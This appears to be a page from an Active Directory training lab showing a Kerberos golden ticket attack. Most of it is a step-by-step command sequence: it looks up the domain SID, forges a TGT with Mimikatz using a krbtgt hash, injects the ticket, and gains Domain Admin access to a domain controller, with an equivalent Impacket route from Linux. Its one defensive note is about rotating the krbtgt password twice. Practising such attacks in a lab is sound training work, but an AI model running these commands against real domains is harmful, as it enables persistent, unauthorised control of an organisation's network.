Pracivo Advanced AD Lab — Golden Ticket

Golden Ticket Attack

PERSISTENCE

With the krbtgt NTLM hash, you can forge Kerberos TGTs for any user — including non-existent ones. Golden tickets persist even after password changes. The only fix is changing krbtgt password TWICE.

# Requirements:
# - krbtgt NTLM hash (from DCSync)
# - Domain SID

# Step 1: Get domain SID
Get-ADDomain | Select-Object DomainSID
# or: whoami /user  (and strip last part after last -)

# Step 2: Forge golden ticket with Mimikatz
kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-XXXXXXXXX /krbtgt:9ce232a9f9b77c3947693e7ebd107823 /id:500
# Creates ticket.kirbi

# Step 3: Inject ticket into current session
kerberos::ptt ticket.kirbi

# Step 4: Verify — access DC
dir \\dc01.corp.local\c$
# Full access — as Domain Admin

# With Impacket (Linux):
python3 ticketer.py -nthash 9ce232a9f9b77c3947693e7ebd107823 -domain-sid S-1-5-21-XXXXXXXXX -domain corp.local FakeAdmin
export KRB5CCNAME=FakeAdmin.ccache
python3 psexec.py -k -no-pass corp.local/FakeAdmin@dc01.corp.local

krbtgt NTLM hash (from DCSync): 9ce232a9f9b77c3947693e7ebd107823
This hash lets you forge tickets for ANY identity in the domain permanently.

🏛️ Pracivo Advanced AD Lab

Golden Ticket Attack